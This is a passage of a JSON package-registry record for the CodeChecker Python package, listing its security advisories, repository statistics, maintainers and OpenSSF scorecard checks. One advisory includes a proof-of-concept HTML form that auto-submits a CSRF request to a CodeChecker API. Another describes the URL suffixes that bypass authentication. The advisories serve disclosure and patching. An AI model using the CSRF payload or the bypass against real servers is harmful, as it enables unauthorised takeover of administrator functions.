6.24.5"}],"ecosystem":"pypi","package_name":"codechecker"}],"created_at":"2025-03-03T20:08:00.668Z","updated_at":"2025-03-03T19:53:19.000Z","epss_percentage":0.00037,"epss_percentile":0.09965},{"uuid":"GSA_kwCzR0hTQS1mM2Y4LXZ4M3ctaHA1cc4ABBBq","url":"https://github.com/advisories/GHSA-f3f8-vx3w-hp5q","title":"codechecker vulnerable to authentication bypass when using specifically crafted URLs","description":"### Summary\nAuthentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.\n\n### Details\nAll endpoints, apart from the /Authentication is affected by the vulnerability.\n\nThe vulnerability allows unauthenticated users to access all API functionality.\nYou can look for the following pattern in the logs to check if the vulnerabilty was exploited:\n![image](https://github.com/user-attachments/assets/6ba02231-a3d8-4832-aee6-f96462b7441e)\n\nNote that the url starts with v and contains a valid CodeChecker endpoint, but it ends in `Authentication`, `Configuration` or `ServerInfo` and it was made by an `Anonymous` user.\n\n### Impact\nThis authentication bypass allows querying, adding, changing, and deleting Products contained on the CodeChecker server, without authentication, by an anonymous user.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-11-06T15:57:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N","references":["https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q","https://nvd.nist.gov/vuln/detail/CVE-2024-10081","https://github.com/Ericsson/codechecker/commit/ad41702e3108e4b92ae5d0143a5b961cc34195eb","https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-238.yaml","https://github.com/advisories/GHSA-f3f8-vx3w-hp5q"],"source_kind":"github","identifiers":["GHSA-f3f8-vx3w-hp5q","CVE-2024-10081"],"repository_url":"https://github.com/Ericsson/codechecker","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"6.24.2","vulnerable_version_range":"\u003c= 6.24.1"}],"ecosystem":"pypi","package_name":"codechecker"}],"created_at":"2024-11-06T16:07:02.008Z","updated_at":"2025-04-08T17:52:09.000Z","epss_percentage":0.5706,"epss_percentile":0.97993},{"uuid":"GSA_kwCzR0hTQS1mOGM4LTRwbTctdzg4Nc4ABDo1","url":"https://github.com/advisories/GHSA-f8c8-4pm7-w885","title":"Cross-Site Request Forgery in CodeChecker API","description":"### Summary\nCross-site request forgery allows an unauthenticated attacker to hijack the authentication of a logged in user, and use the web API with the same permissions.\n\n### Details\nSecurity attributes like HttpOnly and SameSite are missing from the session cookie, allowing its use from XHR requests and form submissions.\nThe CodeChecker API endpoints only require the session cookie, they do not require a CSRF token, and missing HTTP headers allow the form submission to succeed (but not XHR). This means that the attacker needs to know the ID of products to edit or delete them, but it does not need knowledge to create new products with the SQLite backend.\n\n### PoC\nWith a superuser logged into CodeChecker.\n\n```html\n\u003chtml\u003e\u003cbody\u003e\n    \u003cform action=\"https://codechecker.example.com/v6.58/Products\" method=\"POST\" enctype=\"text/plain\"\u003e\n        \u003cinput type=\"text\" name='[1,\"getProducts\",1,1,{}]' value=''\u003e\n    \u003c/form\u003e\n    \u003cscript\u003edocument.forms[0].submit()\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\nOr the same form attack on any of the applicable endpoints.\n\n### Impact\nThe vulnerability allows an attacker to make requests to CodeChecker as the currently logged in user, including but not limited to adding, removing or editing products. The attacker needs to know the ID of the available products to modify or delete them. The attacker cannot directly exfiltrate data from CodeChecker, due to being limited to form-based CSRF.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-01-21T20:25:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/Ericsson/codechecker/security/advisories/GHSA-f8c8-4pm7-w885","https://nvd.nist.gov/vuln/detail/CVE-2024-53829","https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2025-12.yaml","https://github.com/advisories/GHSA-f8c8-4pm7-w885"],"source_kind":"github","identifiers":["GHSA-f8c8-4pm7-w885","CVE-2024-53829"],"repository_url":"https://github.com/Ericsson/codechecker","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"6.24.5","vulnerable_version_range":"\u003c 6.24.5"}],"ecosystem":"pypi","package_name":"codechecker"}],"created_at":"2025-01-21T21:09:26.361Z","updated_at":"2025-04-08T17:52:38.000Z","epss_percentage":0.00033,"epss_percentile":0.07492},{"uuid":"GSA_kwCzR0hTQS1mcG01LTJ3Y2otdmZyN84ABBBr","url":"https://github.com/advisories/GHSA-fpm5-2wcj-vfr7","title":"codechecker authentication method confusion vulnerability allows logging in as the built-in root user from an external service","description":"### Summary\nAuthentication method confusion allows logging in as the built-in root user from an external service. The built-in root user is generated in a weak manner, cannot be disabled, and has universal access. \n\n### Details\nUntil CodeChecker version 6.24.1 there was an auto-generated super-user account that could not be disabled.\nThe attacker needs to know only the username of the root user.\n\nThis root user is unconditionally assigned superuser permissions.\n\nWhich means that if any user via any service logs in with the root user's username, they will unconditionally have superuser permissions on the CodeChecker instance.\n\nThe name of the user name can be found in `root.user` file in the CodeChecker configuration directory.\nYou can check if you are impacted by checking the existence of this user in the external authentication services (e.g. LDAP, PAM etc.).\n\n### Impact\nThis vulnerability allows an attacker who can create an account on an enabled external authentication service, to log in as the root user, and access and control everything that can be controlled via the web interface.\nThe attacker needs to acquire the username of the root user to be successful.\n","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-11-06T15:57:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N","references":["https://github.com/Ericsson/codechecker/security/advisories/GHSA-fpm5-2wcj-vfr7","https://nvd.nist.gov/vuln/detail/CVE-2024-10082","https://github.com/Ericsson/codechecker/commit/866f3796d01f3158c49b87ccae3e09c0807c1c7b","https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-183.yaml","https://github.com/advisories/GHSA-fpm5-2wcj-vfr7"],"source_kind":"github","identifiers":["GHSA-fpm5-2wcj-vfr7","CVE-2024-10082"],"repository_url":"https://github.com/Ericsson/codechecker","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"6.24.2","vulnerable_version_range":"\u003c= 6.24.1"}],"ecosystem":"pypi","package_name":"codechecker"}],"created_at":"2024-11-06T16:07:01.977Z","updated_at":"2025-01-21T17:59:37.000Z","epss_percentage":0.00025,"epss_percentile":0.04902},{"uuid":"GSA_kwCzR0hTQS1meG14LXBmbTItODVtMs0kXw","url":"https://github.com/advisories/GHSA-fxmx-pfm2-85m2","title":"Cross-site Scripting in Ericsson CodeChecker","description":"In Ericsson CodeChecker prior to 6.18.2, a Stored Cross-site scripting (XSS) vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-01-21T23:32:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2021-44217","https://github.com/Ericsson/codechecker/pull/3549","https://codechecker-demo.eastus.cloudapp.azure.com/","https://github.com/Hyperkopite/CVE-2021-44217/blob/main/README.md","https://user-images.githubusercontent.com/9525971/142965091-e118b012-a7fc-4c2f-ad0c-80aeed6f7ec9.png","https://github.com/Ericsson/codechecker/commit/72ee51158e6d81150320223b85410c179b9ee2b1","https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","https://github.com/advisories/GHSA-fxmx-pfm2-85m2"],"source_kind":"github","identifiers":["GHSA-fxmx-pfm2-85m2","CVE-2021-44217"],"repository_url":"https://github.com/Ericsson/codechecker","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"6.18.2","vulnerable_version_range":"\u003c 6.18.2"}],"ecosystem":"pypi","package_name":"codechecker"}],"created_at":"2022-12-21T16:12:38.222Z","updated_at":"2023-02-03T05:04:48.000Z","epss_percentage":0.00741,"epss_percentile":0.71589}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/codechecker","docker_dependents_count":3,"docker_downloads_count":153,"usage_url":"https://repos.ecosyste.ms/usage/pypi/codechecker","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/codechecker/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker/related_packages","maintainers":[{"uuid":"bruntib","login":"bruntib","name":null,"email":null,"url":null,"packages_count":3,"html_url":"https://pypi.org/user/bruntib/","role":null,"created_at":"2023-02-23T20:25:41.792Z","updated_at":"2023-02-23T20:25:41.792Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/bruntib/packages"},{"uuid":"csordasmarton","login":"csordasmarton","name":null,"email":null,"url":null,"packages_count":3,"html_url":"https://pypi.org/user/csordasmarton/","role":null,"created_at":"2023-02-23T20:25:41.829Z","updated_at":"2023-02-23T20:25:41.829Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/csordasmarton/packages"},{"uuid":"vodorok","login":"vodorok","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://pypi.org/user/vodorok/","role":null,"created_at":"2023-02-23T20:25:41.844Z","updated_at":"2023-02-23T20:25:41.844Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/vodorok/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":726135,"maintainers_count":308800,"namespaces_count":0,"keywords_count":238245,"github":"pypi","metadata":{"funded_packages_count":50579},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2025-09-08T05:32:36.857Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":2674738,"name":"codechecker-api","ecosystem":"pypi","description":"Generated Python compatible API stubs for CodeChecker.","homepage":"https://github.com/Ericsson/codechecker","licenses":"apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Ericsson/codechecker","keywords_array":["codechecker","thrift","api","library"],"namespace":null,"versions_count":60,"first_release_published_at":"2020-02-17T16:19:46.000Z","latest_release_published_at":"2021-01-28T10:54:32.000Z","latest_release_number":"6.39.0","last_synced_at":"2025-08-19T18:10:28.150Z","created_at":"2022-04-10T10:23:46.262Z","updated_at":"2025-08-19T18:14:34.536Z","registry_url":"https://pypi.org/project/codechecker-api/","install_command":"pip install codechecker-api --index-url https://pypi.org/simple","documentation_url":"https://codechecker-api.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 3 - Alpha","Intended Audience :: Developers","Programming Language :: Python :: 2","Programming Language :: Python :: 3"],"normalized_name":"codechecker-api","project_status":null},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: 